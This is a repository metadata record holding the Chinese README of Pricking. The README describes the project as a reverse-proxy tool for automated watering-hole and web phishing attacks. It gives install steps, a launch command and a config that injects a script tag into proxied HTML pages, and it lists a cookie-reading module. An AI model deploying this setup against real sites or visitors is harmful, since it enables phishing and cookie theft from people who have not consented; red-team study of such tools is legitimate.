{"id":13842398,"url":"https://github.com/Rvn0xsy/Pricking","last_synced_at":"2025-07-11T15:31:12.491Z","repository":{"id":50669062,"uuid":"339347148","full_name":"Rvn0xsy/Pricking","owner":"Rvn0xsy","description":"基于反向代理的水坑部署工具","archived":false,"fork":false,"pushed_at":"2021-12-31T05:15:38.000Z","size":67,"stargazers_count":248,"open_issues_count":0,"forks_count":36,"subscribers_count":9,"default_branch":"main","last_synced_at":"2024-08-05T17:31:34.430Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Rvn0xsy.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-02-16T09:32:06.000Z","updated_at":"2024-08-02T06:40:28.000Z","dependencies_parsed_at":"2022-08-25T13:22:51.608Z","dependency_job_id":null,"html_url":"https://github.com/Rvn0xsy/Pricking","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Rvn0xsy%2FPricking","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Rvn0xsy%2FPricking/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Rvn0xsy%2FPricking/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Rvn0xsy%2FPricking/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Rvn0xsy","download_url":"https://codeload.github.com/Rvn0xsy/Pricking/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225736871,"owners_count":17516252,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:33.784Z","updated_at":"2024-11-21T13:30:28.865Z","avatar_url":"https://github.com/Rvn0xsy.png","language":"Go","funding_links":[],"categories":["Go"],"sub_categories":[],"readme":"# Pricking\n\n[Pricking](https://github.com/Rvn0xsy/Pricking) 是一个自动化部署水坑和网页钓鱼的项目。\n\n想要了解更多可以阅读：\n\n- [红队技巧：基于反向代理的水坑攻击](https://payloads.online/archivers/2021-02-16/1)\n\n:collision: :collision: :collision: 支持HTTPS/HTTP\n\n## 使用方法\n\n更多使用方式可以参考 [Pricking Wiki](https://github.com/Rvn0xsy/Pricking/wiki)\n\n\u003e 使用本项目需要拥有一个域名，将A记录指向到当前服务器，否则只能通过IP访问。\n\n### 安装方式 - Golang install\n\n```bash\n$ go install -v github.com/Rvn0xsy/Pricking/cmd/pricking@latest\n```\n\n### 安装方式 - 下载二进制文件\n\n[Releases](https://github.com/Rvn0xsy/Pricking/releases)\n\n### 安装方式 - 编译\n\n```bash\n$ git clone https://github.com/Rvn0xsy/Pricking\n$ cd Pricking\n$ make\n```\n\n### Quick Start Pricking Web :collision:\n\n```bash\n$ ./pricking -config ./config/config.yaml -url https://payloads.online\n```\n\n### 配置文件\n\n```yaml\nfilter_type:\n  - \"text/html\" # 仅针对网页内容进行注入\nexclude_file:   # 静态文件的数据包不进行注入\n  - \".jpg\"\n  - \".css\"\n  - \".png\"\n  - \".js\"\n  - \".ico\"\n  - \".svg\"\n  - \".gif\"\n  - \".jpeg\"\n  - \".woff\"\n  - \".tff\"\nstatic_dir: \"./pricking-js-suite\" # Pricking Js Suite 目录\npricking_prefix_url: \"/pricking_static_files\" # 静态目录名，不能与目标网站冲突\nlisten_address: \":9999\" # 监听地址:端口\ninject_body: \"\u003cscript src='/pricking_static_files/static.js' type='module'\u003e\u003c/script\u003e\" # 注入代码\n```\n\n## [Pricking Js Suite 模块说明](pricking-js-suite/)\n\n- modules/cookie.js 获取网页Cookie并打印在控制台上\n- ...\n\n## 引入方式\n\n在static.js中添加：\n\n```js\nimport * as \u003cModuleName\u003e from './modules/\u003cModuleName\u003e.js'\n```\n\n例如 `cookie.js`：\n\n```js\nimport * as Cookie from './modules/cookie.js'\n```\n\n## 贡献\n\n请为我提交[Pull Request](https://github.com/Rvn0xsy/Pricking/pulls)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FRvn0xsy%2FPricking","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FRvn0xsy%2FPricking","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FRvn0xsy%2FPricking/lists"}